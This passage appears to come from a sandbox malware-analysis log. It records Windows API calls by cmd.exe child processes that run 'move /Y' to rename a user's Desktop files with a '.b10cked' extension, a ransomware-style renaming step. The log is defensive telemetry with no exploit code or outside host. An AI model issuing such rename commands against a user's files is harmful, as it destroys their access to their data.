lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0231.933] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2818c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0231.933] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0231.933] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0231.933] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0231.933] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0231.933] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0231.933] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0231.933] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0231.933] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0231.933] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0231.933] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0231.933] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0231.933] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0231.933] GetEnvironmentStringsW () returned 0x2822b8* [0231.933] FreeEnvironmentStringsW (penv=0x2822b8) returned 1 [0231.933] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0231.933] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0231.933] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0231.933] _wcsicmp (_String1="KEYS", 
_String2="ERRORLEVEL") returned 6 [0231.934] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0231.934] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0231.934] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0231.934] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0231.934] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0231.934] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0231.934] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x16fbb8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0231.934] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x16fbb8, lpFilePart=0x16fbb4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x16fbb4*="Desktop") returned 0x18 [0231.934] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0231.934] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x16f934 | out: lpFindFileData=0x16f934) returned 0x27fff8 [0231.934] FindClose (in: hFindFile=0x27fff8 | out: hFindFile=0x27fff8) returned 1 [0231.935] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x16f934 | out: lpFindFileData=0x16f934) returned 0x27fff8 [0231.935] FindClose (in: hFindFile=0x27fff8 | out: hFindFile=0x27fff8) returned 1 [0231.935] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x16f934 | out: lpFindFileData=0x16f934) returned 0x27fff8 [0231.935] FindClose (in: hFindFile=0x27fff8 | out: hFindFile=0x27fff8) returned 1 [0231.935] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0231.935] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0231.935] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0231.935] 
GetEnvironmentStringsW () returned 0x282ad8* [0231.935] FreeEnvironmentStringsW (penv=0x282ad8) returned 1 [0231.935] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0231.936] GetConsoleOutputCP () returned 0x1b5 [0231.977] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0231.977] GetUserDefaultLCID () returned 0x409 [0231.980] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0231.980] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x16fcf8, cchData=128 | out: lpLCData="0") returned 2 [0231.980] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x16fcf8, cchData=128 | out: lpLCData="0") returned 2 [0231.980] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x16fcf8, cchData=128 | out: lpLCData="1") returned 2 [0231.980] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0231.980] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0231.980] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0231.980] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0231.980] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0231.980] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0231.980] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0231.981] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0231.981] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, 
cchData=8 | out: lpLCData=".") returned 2 [0231.981] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0231.981] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0231.982] GetConsoleTitleW (in: lpConsoleTitle=0x2708d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0231.998] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0231.998] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0231.999] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0231.999] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0232.000] _wcsicmp (_String1="move", _String2=")") returned 68 [0232.000] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0232.000] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0232.000] _wcsicmp (_String1="IF", _String2="move") returned -4 [0232.000] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0232.000] _wcsicmp (_String1="REM", _String2="move") returned 5 [0232.000] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0232.005] GetConsoleTitleW (in: lpConsoleTitle=0x16f9f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0232.047] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0232.047] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0232.047] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0232.047] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0232.047] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0232.047] _wcsicmp (_String1="move", _String2="CD") returned 10 [0232.047] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0232.047] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0232.047] _wcsicmp (_String1="move", _String2="REN") returned -5 [0232.047] _wcsicmp 
(_String1="move", _String2="ECHO") returned 8 [0232.047] _wcsicmp (_String1="move", _String2="SET") returned -6 [0232.047] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0232.047] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0232.047] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0232.047] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0232.047] _wcsicmp (_String1="move", _String2="MD") returned 11 [0232.048] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0232.048] _wcsicmp (_String1="move", _String2="RD") returned -5 [0232.048] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0232.048] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0232.048] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0232.048] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0232.048] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0232.048] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0232.048] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0232.048] _wcsicmp (_String1="move", _String2="VER") returned -9 [0232.048] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0232.048] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0232.048] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0232.048] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0232.048] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0232.048] _wcsicmp (_String1="move", _String2="START") returned -6 [0232.048] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0232.048] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0232.048] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0232.050] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0232.050] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0232.050] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x16f7ac, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x16f7a4, 
lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x16f7a4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0232.051] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0232.051] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0232.051] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0232.051] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0232.051] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0232.051] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0232.051] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0232.051] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0232.051] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0232.051] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0232.051] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0232.051] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0232.051] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0232.051] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0232.051] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0232.051] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.051] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.051] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.051] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.051] _wcsnicmp 
(_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0232.051] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0232.051] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0232.051] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0232.051] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0232.051] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0232.051] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0232.051] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0232.051] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0232.052] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0232.052] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0232.052] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0232.052] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0232.052] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0232.052] _wcsicmp (_String1="MPZFED~1.FLV", _String2=".") returned 63 [0232.052] _wcsicmp (_String1="MPZFED~1.FLV", _String2="..") returned 63 [0232.052] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\MPZFED~1.FLV" (normalized: "c:\\users\\eebsym5\\desktop\\mpzfed~1.flv")) returned 0x20 [0232.053] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x281d40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0232.053] SetErrorMode (uMode=0x0) returned 0x0 [0232.053] SetErrorMode (uMode=0x1) returned 0x0 [0232.053] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\MPZFED~1.FLV", nBufferLength=0x104, lpBuffer=0x16f134, lpFilePart=0x16f11c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\MPZFED~1.FLV", 
lpFilePart=0x16f11c*="MPZFED~1.FLV") returned 0x25 [0232.053] SetErrorMode (uMode=0x0) returned 0x1 [0232.053] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0232.053] _wcsicmp (_String1="MPZFED~1.FLV", _String2=".") returned 63 [0232.053] _wcsicmp (_String1="MPZFED~1.FLV", _String2="..") returned 63 [0232.053] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\MPZFED~1.FLV" (normalized: "c:\\users\\eebsym5\\desktop\\mpzfed~1.flv")) returned 0x20 [0232.053] SetErrorMode (uMode=0x0) returned 0x0 [0232.053] SetErrorMode (uMode=0x1) returned 0x0 [0232.053] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\MPZFED~1.FLV", nBufferLength=0x104, lpBuffer=0x16f5b0, lpFilePart=0x16f348 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\MPZFED~1.FLV", lpFilePart=0x16f348*="MPZFED~1.FLV") returned 0x25 [0232.053] SetErrorMode (uMode=0x0) returned 0x1 [0232.053] SetErrorMode (uMode=0x0) returned 0x0 [0232.054] SetErrorMode (uMode=0x1) returned 0x0 [0232.054] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\mPZFEDoY9Zi_en.flv.b10cked", nBufferLength=0x104, lpBuffer=0x16f7b8, lpFilePart=0x16f348 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\mPZFEDoY9Zi_en.flv.b10cked", lpFilePart=0x16f348*="mPZFEDoY9Zi_en.flv.b10cked") returned 0x33 [0232.054] SetErrorMode (uMode=0x0) returned 0x1 [0232.054] SetLastError (dwErrCode=0x0) [0232.054] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\mPZFEDoY9Zi_en.flv.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\mpzfedoy9zi_en.flv.b10cked")) returned 0xffffffff [0232.054] GetLastError () returned 0x2 [0232.054] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\MPZFED~1.FLV", fInfoLevelId=0x1, lpFindFileData=0x16ecc4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16ecc4) returned 0x270f08 [0232.054] FindNextFileW (in: hFindFile=0x270f08, lpFindFileData=0x16ecc4 | out: 
lpFindFileData=0x16ecc4) returned 0 [0232.055] GetLastError () returned 0x12 [0232.055] FindClose (in: hFindFile=0x270f08 | out: hFindFile=0x270f08) returned 1 [0232.056] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\MPZFED~1.FLV", fInfoLevelId=0x1, lpFindFileData=0x281ae0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x281ae0) returned 0x270f08 [0232.056] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\mPZFEDoY9Zi_en.flv.b10cked", nBufferLength=0x104, lpBuffer=0x16ef5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\mPZFEDoY9Zi_en.flv.b10cked", lpFilePart=0x0) returned 0x33 [0232.056] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\mPZFEDoY9Zi_en.flv", nBufferLength=0x104, lpBuffer=0x16ef5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\mPZFEDoY9Zi_en.flv", lpFilePart=0x0) returned 0x2b [0232.056] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\mPZFEDoY9Zi_en.flv" (normalized: "c:\\users\\eebsym5\\desktop\\mpzfedoy9zi_en.flv")) returned 0x20 [0232.056] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\mPZFEDoY9Zi_en.flv" (normalized: "c:\\users\\eebsym5\\desktop\\mpzfedoy9zi_en.flv"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\mPZFEDoY9Zi_en.flv.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\mpzfedoy9zi_en.flv.b10cked"), dwFlags=0x3) returned 1 [0232.057] FindClose (in: hFindFile=0x270f08 | out: hFindFile=0x270f08) returned 1 [0232.057] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x16ef10 | out: _Buffer=" 1") returned 9 [0232.057] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.057] GetFileType (hFile=0x7) returned 0x2 [0232.144] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0232.144] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16ee9c | out: lpMode=0x16ee9c) returned 1 [0232.145] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.145] GetConsoleScreenBufferInfo (in: 
hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16eed0 | out: lpConsoleScreenBufferInfo=0x16eed0) returned 1 [0232.146] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0232.146] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x16ef10 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0232.146] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x16eef4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x16eef4*=0x1a) returned 1 [0232.149] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.149] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0232.174] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.174] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0232.175] _get_osfhandle (_FileHandle=0) returned 0x3 [0232.175] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0232.176] SetConsoleInputExeNameW () returned 0x1 [0232.176] GetConsoleOutputCP () returned 0x1b5 [0232.177] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0232.177] SetThreadUILanguage (LangId=0x0) returned 0x409 [0232.178] exit (_Code=0) Process: id = "611" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16d20" os_pid = "0x910" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\SXGPQH~1.ODP\" \"C:\\Users\\EEBsYm5\\Desktop\\SXGpQHv i4OFxmN5_1.odp.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = 
"CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 34385 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 34386 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 34387 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 34388 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 34389 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 34390 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 34391 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 34392 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 34393 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 34394 start_va = 
0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 34543 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 34544 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 34545 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 34546 start_va = 0x310000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 34547 start_va = 0x370000 end_va = 0x46ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 34548 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 34549 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 34550 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 34551 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 34552 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" 
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 34553 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 34554 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 34555 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 34556 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 34557 start_va = 0x200000 end_va = 0x2c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 34558 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 34559 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 34560 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 34561 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 34562 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 
